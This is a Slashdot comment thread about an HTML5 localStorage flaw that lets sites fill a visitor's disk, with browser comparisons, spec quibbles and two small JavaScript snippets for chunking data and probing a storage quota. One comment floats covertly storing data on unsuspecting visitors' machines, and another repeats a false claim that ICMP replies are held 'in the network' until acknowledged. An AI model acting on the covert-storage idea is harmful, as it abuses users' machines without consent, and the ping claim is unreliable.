Beorytis (1014777) | about a year ago | (#43036463)

Where did Mozilla come from, and where did Apple go?

The first part was talking about bugs; the second was talking about storage limits. Mozilla has no bug but does have a storage limit. Apple presumably has the bug, but we don't know what its storage limit is.

Re:Editing (1)

ledow (319597) | about a year ago | (#43036563)

And Opera loses mention later on entirely. Probably because the bug doesn't exist on the last few Opera stable versions at all:

http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

HTML5 Browsers? (0)

Anonymous Coward | about a year ago | (#43036099)

I use Internet Explorer, you insensitive clod!

Distributed storage? (1)

tippe (1136385) | about a year ago | (#43036133)

I wonder if one could create some form of useless distributed storage using this. Basically, have your web app use the 5MB of free space on each computer that visits you as the storage medium for a filesystem. It would be atrociously slow (access time for a particular block could be hours, days, weeks or longer), unreliable (non-repeat visitors, or visitors that clear their cache, represent data loss) and difficult to expand (to grow your storage you'd have to convince more people to visit your site), but if you were really bored and had nothing else to do, it could be an interesting project.

It sort of reminds me of a hack/proof-of-concept "storage" method somebody once told me was possible using "ping". Basically, ping a host with an ICMP ping packet having the data you want to store in the "payload"; the destination host will apparently send this payload back to you in the ICMP response. Apparently, if you ignore (don't ACK) the response, the destination host will continuously try to resend the packet back to you, effectively storing your data "in the network". When you want to retrieve the data, ACK the response...
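The localStorage half of that idea is simple to sketch. This is a hypothetical illustration only (the function names and the 5 MB per-visitor figure are assumptions, not a real protocol): split a blob into visitor-sized chunks, park one chunk in each visitor's localStorage, and reassemble whichever chunks come back, in whatever order they arrive:

```javascript
// Sketch of the "useless distributed storage" idea above.
const CHUNK_BYTES = 5 * 1024 * 1024; // one visitor's assumed storage quota

function splitIntoChunks(data, chunkBytes = CHUNK_BYTES) {
  const chunks = [];
  for (let i = 0; i < data.length; i += chunkBytes) {
    // Tag each chunk with its index so out-of-order retrieval still works.
    chunks.push({ index: chunks.length, payload: data.slice(i, i + chunkBytes) });
  }
  return chunks;
}

function reassemble(chunks) {
  // Visitors return chunks in arbitrary order; missing chunks mean data loss.
  return chunks
    .slice()
    .sort((a, b) => a.index - b.index)
    .map(c => c.payload)
    .join('');
}
```

The indices are what make the "hours-to-weeks access time" tolerable at all: you can accept chunks whenever a visitor happens to return.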

Re:Distributed storage? (0)

Anonymous Coward | about a year ago | (#43036411)

Just what I was thinking -- set up something like Dropbox, but without all the costs of servers... With enough copies on unsuspecting hosts, it might even be fast. Unethical sure, but would this be illegal?

Awesome for FireFox! (0)

EmagGeek (574360) | about a year ago | (#43036145)

Now, not only will FireFox slowly eat up gigabytes of RAM, but it'll also silently and slowly fill your entire hard disk!

I was wondering when the leaking-storage feature would mutate from RAM to disk.

Re:Awesome for FireFox! (0)

Anonymous Coward | about a year ago | (#43036423)

Didn't even RTFS - FireFox is /not/ vulnerable to this.

-Posted from 417MB of FireFox.

Re:Awesome for FireFox! (2)

gman003 (1693318) | about a year ago | (#43036487)

Erm, you got it backwards. Firefox implements the standard properly, and is thus not vulnerable to disk-filling attacks of this sort. It's every other browser that is vulnerable.

Re:Awesome for FireFox! (1)

DragonWriter (970822) | about a year ago | (#43036663)

Erm, you got it backwards. Firefox implements the standard properly

The Web Storage specification never actually specifies the behavior of the recommended-but-not-required functionality for identifying "affiliated" origins and preventing their use to circumvent the (likewise recommended-but-not-required) per-origin quotas. In particular, the criteria for defining affiliated origins are never given; all the spec provides is a single, incompletely-specified example of a set of affiliated origins. So it is inaccurate:

  • To say that a browser which implements no functionality in this regard does not implement the standard "properly", or
  • To say, based on any particular test, that a browser does or does not implement the recommended behavior.
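For what it's worth, the one behavior you can test empirically is the effective quota itself: filldisk-style demos find it by writing until the browser throws a QuotaExceededError-style exception. A rough sketch (the function name is made up; in a browser you would pass `window.localStorage` as `storage`):

```javascript
// Probe how much a given Web Storage object will accept for one origin,
// assuming setItem throws once the quota is exceeded (as per the spec).
function probeQuota(storage, chunkSize) {
  const chunk = 'x'.repeat(chunkSize);
  let stored = 0;
  try {
    // Keep appending chunks under distinct keys until the quota is hit.
    for (;;) {
      storage.setItem('probe-' + stored, chunk);
      stored += chunkSize;
    }
  } catch (e) {
    // Quota exceeded; remove the probe keys so nothing is left behind.
    for (let i = 0; i < stored; i += chunkSize) {
      storage.removeItem('probe-' + i);
    }
  }
  return stored; // bytes accepted before the quota kicked in
}
```

The result only tells you the per-origin limit, though; it says nothing about whether the browser groups affiliated origins, which is the whole dispute above.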

Disk quotas (1)

Anonymous Coward | about a year ago | (#43036303)

This is why I have disk quotas enabled on my personal machine, even though I'm the only user. I don't want a rogue process running under my UID using up those last few GB that the system will eventually need.

Opera? (2)

ledow (319597) | about a year ago | (#43036359)

I call crap on the Opera thing.

Latest stable Opera browser here, 12.14, updated 5th February:

http://www.ledow.org.uk/Opera.jpg [ledow.org.uk]

No mention of this in the 12.14 release notes (even as a "vulnerability with details to follow later", which is common practice for Opera changelogs), and silence on the article about exactly how/why/where Opera is vulnerable.

If something pops up a million times asking you for a gigabyte and you click yes every time, then that's perfectly acceptable: the user gave permission.

You insensitive clod! (-1)

Anonymous Coward | about a year ago | (#43036751)

the facts and